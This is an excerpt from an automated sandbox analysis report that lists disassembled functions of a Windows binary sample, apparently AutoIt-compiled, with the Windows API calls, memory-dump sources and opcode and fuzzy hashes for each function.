                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                        • String ID:
                                                        • API String ID: 3311875123-0
                                                        • Opcode ID: 928b6e0f4e8ca3e0d284427f8da0062568fc4b86086e4e53e829a6428f023800
                                                        • Instruction ID: b1690d0ed98c6a5d6f989db57a89daac4a77b1a562d79ce62214af4c0aec761f
                                                        • Opcode Fuzzy Hash: 928b6e0f4e8ca3e0d284427f8da0062568fc4b86086e4e53e829a6428f023800
                                                        • Instruction Fuzzy Hash: 2A51D230A00269FFDF25CF68E988BADBBF5FF19314F104129E8119B2A0D3788965CB51
                                                        Function 000C1765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 000C2612: GetWindowLongW.USER32(?,000000EB), ref: 000C2623
                                                        • BeginPaint.USER32(?,?,?,?,?,?), ref: 000C179A
                                                        • GetWindowRect.USER32(?,?), ref: 000C17FE
                                                        • ScreenToClient.USER32(?,?), ref: 000C181B
                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 000C182C
                                                        • EndPaint.USER32(?,?), ref: 000C1876
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                        • String ID:
                                                        • API String ID: 1827037458-0
                                                        • Opcode ID: 5d6b98358b92d30585d63e5b284588c10e2a4d8090e2bc87644f2f85437bba17
                                                        • Instruction ID: cb348dd0eab96aac49527420fffcf77be6899af6e0eedac52100bad3b57a697b
                                                        • Opcode Fuzzy Hash: 5d6b98358b92d30585d63e5b284588c10e2a4d8090e2bc87644f2f85437bba17
                                                        • Instruction Fuzzy Hash: CA41AE34104700AFD720DF25CC84FBA7BE9EB46724F04466DFAA4866B2CB309986DB61
                                                        Function 0014B69E Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ShowWindow.USER32(001857B0,00000000,01444A18,?,?,001857B0,?,0014B5A8,?,?), ref: 0014B712
                                                        • EnableWindow.USER32(00000000,00000000), ref: 0014B736
                                                        • ShowWindow.USER32(001857B0,00000000,01444A18,?,?,001857B0,?,0014B5A8,?,?), ref: 0014B796
                                                        • ShowWindow.USER32(00000000,00000004,?,0014B5A8,?,?), ref: 0014B7A8
                                                        • EnableWindow.USER32(00000000,00000001), ref: 0014B7CC
                                                        • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0014B7EF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Window$Show$Enable$MessageSend
                                                        • String ID:
                                                        • API String ID: 642888154-0
                                                        • Opcode ID: 0c3fa6c12ad229404181752265a4858bde5a80cd121a6f94e10211358b58eeb2
                                                        • Instruction ID: 2e69aa535dc27b2b2123203af2d9b9712fdf93cb38226ad4b950726b2363f4b8
                                                        • Opcode Fuzzy Hash: 0c3fa6c12ad229404181752265a4858bde5a80cd121a6f94e10211358b58eeb2
                                                        • Instruction Fuzzy Hash: EA417C34609240AFDB22CF28C4DAB957BE1FF45312F1841B9EA488F6B2C731E856CB50
                                                        Function 0013709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetForegroundWindow.USER32(?,?,?,?,?,?,00134E41,?,?,00000000,00000001), ref: 001370AC
                                                          • Part of subcall function 001339A0: GetWindowRect.USER32(?,?), ref: 001339B3
                                                        • GetDesktopWindow.USER32 ref: 001370D6
                                                        • GetWindowRect.USER32(00000000), ref: 001370DD
                                                        • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0013710F
                                                          • Part of subcall function 00125244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 001252BC
                                                        • GetCursorPos.USER32(?), ref: 0013713B
                                                        • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00137199
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                        • String ID:
                                                        • API String ID: 4137160315-0
                                                        • Opcode ID: 247f7dbd3bf6b6bca09c8420ab0e8976b6cd040663657209548b6090424ab894
                                                        • Instruction ID: e5b4f8aa845bb3970b4ee26817a6141837dfc83f842dc8df56d39dfaaf2c4605
                                                        • Opcode Fuzzy Hash: 247f7dbd3bf6b6bca09c8420ab0e8976b6cd040663657209548b6090424ab894
                                                        • Instruction Fuzzy Hash: 9531D272509305ABD720DF14D849F9BBBEAFF89314F000929F58597291C730EA49CB92
                                                        Function 00118879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 001180A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 001180C0
                                                          • Part of subcall function 001180A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 001180CA
                                                          • Part of subcall function 001180A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 001180D9
                                                          • Part of subcall function 001180A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 001180E0
                                                          • Part of subcall function 001180A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 001180F6
                                                        • GetLengthSid.ADVAPI32(?,00000000,0011842F), ref: 001188CA
                                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 001188D6
                                                        • HeapAlloc.KERNEL32(00000000), ref: 001188DD
                                                        • CopySid.ADVAPI32(00000000,00000000,?), ref: 001188F6
                                                        • GetProcessHeap.KERNEL32(00000000,00000000,0011842F), ref: 0011890A
                                                        • HeapFree.KERNEL32(00000000), ref: 00118911
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                        • String ID:
                                                        • API String ID: 3008561057-0
                                                        • Opcode ID: cd0b6074e4f1fd2d0199a053ec1b4759bfc490c297b52df10a00487ff6d7be06
                                                        • Instruction ID: adde6e3c05fb9c74112e9898ef2cbcb45ed43244d151cf8c2d508b51b6a42343
                                                        • Opcode Fuzzy Hash: cd0b6074e4f1fd2d0199a053ec1b4759bfc490c297b52df10a00487ff6d7be06
                                                        • Instruction Fuzzy Hash: B6117F75501209FFDB189FA4DC09BFE77A9EB85315F10816DF84597220CB329986DB60
                                                        Function 001185B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 001185E2
                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 001185E9
                                                        • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 001185F8
                                                        • CloseHandle.KERNEL32(00000004), ref: 00118603
                                                        • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00118632
                                                        • DestroyEnvironmentBlock.USERENV(00000000), ref: 00118646
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                        • String ID:
                                                        • API String ID: 1413079979-0
                                                        • Opcode ID: 269369c51cc009315544e48443c07015c455abd6b9a9f0e5cc03cdc071b43f29
                                                        • Instruction ID: b944a9a73420e21117021117235b55b2c34086b38399323ce71b608f196341e8
                                                        • Opcode Fuzzy Hash: 269369c51cc009315544e48443c07015c455abd6b9a9f0e5cc03cdc071b43f29
                                                        • Instruction Fuzzy Hash: E3116A7650024DABDF118FA4DD49FDE7BA9EF49354F048168FE04A2260C7768DA2EB60
                                                        Function 0011B790 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDC.USER32(00000000), ref: 0011B7B5
                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 0011B7C6
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0011B7CD
                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0011B7D5
                                                        • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0011B7EC
                                                        • MulDiv.KERNEL32(000009EC,?,?), ref: 0011B7FE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: CapsDevice$Release
                                                        • String ID:
                                                        • API String ID: 1035833867-0
                                                        • Opcode ID: 7859f64075216e42c8777ba46e0bdb6ad93c4d64862ec5b16b971ddca2b54696
                                                        • Instruction ID: a728022d840f61e07195252080edb238326dfc171776faa007b9716af757c185
                                                        • Opcode Fuzzy Hash: 7859f64075216e42c8777ba46e0bdb6ad93c4d64862ec5b16b971ddca2b54696
                                                        • Instruction Fuzzy Hash: 5A017179A00219BBEB109BB69C45A5EBFB8EB49751F044079FA08A7391D6309C41CF90
                                                        Function 000E0162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 000E0193
                                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 000E019B
                                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 000E01A6
                                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 000E01B1
                                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 000E01B9
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 000E01C1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Virtual
                                                        • String ID:
                                                        • API String ID: 4278518827-0
                                                        • Opcode ID: c0e1d68b1bac4b1d5d6a191d7ae6ac9f012bf6432d0f93457a6dd32c05791f9f
                                                        • Instruction ID: 1f62fff1bc07177d98e095aef0a3b29e02b90424dd40b0918ea9447854b417e8
                                                        • Opcode Fuzzy Hash: c0e1d68b1bac4b1d5d6a191d7ae6ac9f012bf6432d0f93457a6dd32c05791f9f
                                                        • Instruction Fuzzy Hash: 8C016CB09027597DE3008F5A8C85B52FFA8FF19354F00411FA15C47A41C7F5A868CBE5
                                                        Function 001253E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 001253F9
                                                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0012540F
                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 0012541E
                                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0012542D
                                                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00125437
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0012543E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                        • String ID:
                                                        • API String ID: 839392675-0
                                                        • Opcode ID: 9cc46551e7ba0657f9fdacacffcf6eaf16977ae192a897d9b818017ccdb2f345
                                                        • Instruction ID: 2cc4bbb09d446f18ff0418cdd1d97d587d8a2ddd172920495f079563b79bd123
                                                        • Opcode Fuzzy Hash: 9cc46551e7ba0657f9fdacacffcf6eaf16977ae192a897d9b818017ccdb2f345
                                                        • Instruction Fuzzy Hash: 5EF01D36241558BBE7215BA29C0DEEB7A7CEBC7B11F00016DFA04D1561A7A11A4286B5
                                                        Function 00127230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • InterlockedExchange.KERNEL32(?,?), ref: 00127243
                                                        • EnterCriticalSection.KERNEL32(?,?,000D0EE4,?,?), ref: 00127254
                                                        • TerminateThread.KERNEL32(00000000,000001F6,?,000D0EE4,?,?), ref: 00127261
                                                        • WaitForSingleObject.KERNEL32(00000000,000003E8,?,000D0EE4,?,?), ref: 0012726E
                                                          • Part of subcall function 00126C35: CloseHandle.KERNEL32(00000000,?,0012727B,?,000D0EE4,?,?), ref: 00126C3F
                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00127281
                                                        • LeaveCriticalSection.KERNEL32(?,?,000D0EE4,?,?), ref: 00127288
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                        • String ID:
                                                        • API String ID: 3495660284-0
                                                        • Opcode ID: eb608bf3247c7f92005e97513a95e47cad9fc1662db508cd476952cfe2819179
                                                        • Instruction ID: 306f9848299878c709ef766d06c386c3ed58f3cce09d2596bd83b97f88f986d5
                                                        • Opcode Fuzzy Hash: eb608bf3247c7f92005e97513a95e47cad9fc1662db508cd476952cfe2819179
                                                        • Instruction Fuzzy Hash: 2CF05E3A540612EBE7112B64ED4CDDB7769EF46702B100539F503915B0CBB698A2CB60
                                                        Function 00118992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0011899D
                                                        • UnloadUserProfile.USERENV(?,?), ref: 001189A9
                                                        • CloseHandle.KERNEL32(?), ref: 001189B2
                                                        • CloseHandle.KERNEL32(?), ref: 001189BA
                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 001189C3
                                                        • HeapFree.KERNEL32(00000000), ref: 001189CA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                        • String ID:
                                                        • API String ID: 146765662-0
                                                        • Opcode ID: d816d8b14eac42bd610ca371238062d698ffc32eefedd14d2c6e231033d64ac1
                                                        • Instruction ID: 555f3c6a42d09015caefffa15246113368969c69052b9c94b8666778203da99b
                                                        • Opcode Fuzzy Hash: d816d8b14eac42bd610ca371238062d698ffc32eefedd14d2c6e231033d64ac1
                                                        • Instruction Fuzzy Hash: C9E07D7A104505FBD7011FE5EC0C956BFB9FF8AB627504635F219C1A70CB3254A2DB50
                                                        Function 001385ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • VariantInit.OLEAUT32(?), ref: 00138613
                                                        • CharUpperBuffW.USER32(?,?), ref: 00138722
                                                        • VariantClear.OLEAUT32(?), ref: 0013889A
                                                          • Part of subcall function 00127562: VariantInit.OLEAUT32(00000000), ref: 001275A2
                                                          • Part of subcall function 00127562: VariantCopy.OLEAUT32(00000000,?), ref: 001275AB
                                                          • Part of subcall function 00127562: VariantClear.OLEAUT32(00000000), ref: 001275B7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                        • API String ID: 4237274167-1221869570
                                                        • Opcode ID: 2f4433bb7dbcc5b7f40dfc34c74afe7b454e1d402e0d473a6c9e488a8e26f118
                                                        • Instruction ID: 8a0249eafe2f8addd5eb2f8c2aa768ceb625e4c43f6e4b7c9972aab4404c13b3
                                                        • Opcode Fuzzy Hash: 2f4433bb7dbcc5b7f40dfc34c74afe7b454e1d402e0d473a6c9e488a8e26f118
                                                        • Instruction Fuzzy Hash: EB917C746083019FCB14DF24C48599ABBF4FF89714F14896DF88A8B362DB30E945CB92
                                                        Function 00122A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 000DFC86: _wcscpy.LIBCMT ref: 000DFCA9
                                                        • _memset.LIBCMT ref: 00122B87
                                                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00122BB6
                                                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00122C69
                                                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00122C97
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                        • String ID: 0
                                                        • API String ID: 4152858687-4108050209
                                                        • Opcode ID: 55af1975985b4ffc13363534bf4570aa8bf6d8da8d34813fa4148f52d564c37d
                                                        • Instruction ID: 6f684f6b3a05c3cb4b07566bd558aef0ca8aee14184f408dace05154fc7c8117
                                                        • Opcode Fuzzy Hash: 55af1975985b4ffc13363534bf4570aa8bf6d8da8d34813fa4148f52d564c37d
                                                        • Instruction Fuzzy Hash: DA51B171508321AFD725AF28E845AAF77E8EF55310F040A2DF895E72A1DB70CD648B52
                                                        Function 000D3137 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 161COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: _memmove$_free
                                                        • String ID: 3c$_
                                                        • API String ID: 2620147621-867841958
                                                        • Opcode ID: b2b92be34cd2a98dc6e084c72c658e5f065f30c588275d4eebdb5dbf09d53b3c
                                                        • Instruction ID: 6c8d7ee9e43454490eb0f172e18ffb3147e3e512672386476264e877dba9253e
                                                        • Opcode Fuzzy Hash: b2b92be34cd2a98dc6e084c72c658e5f065f30c588275d4eebdb5dbf09d53b3c
                                                        • Instruction Fuzzy Hash: 9B518A756083418FDB64CF28C880B6BBBE5BF85300F44482EE98997351EB35E941CB53
                                                        Function 000D6192 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 141COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: _memset$_memmove
                                                        • String ID: 3c$ERCP
                                                        • API String ID: 2532777613-791435382
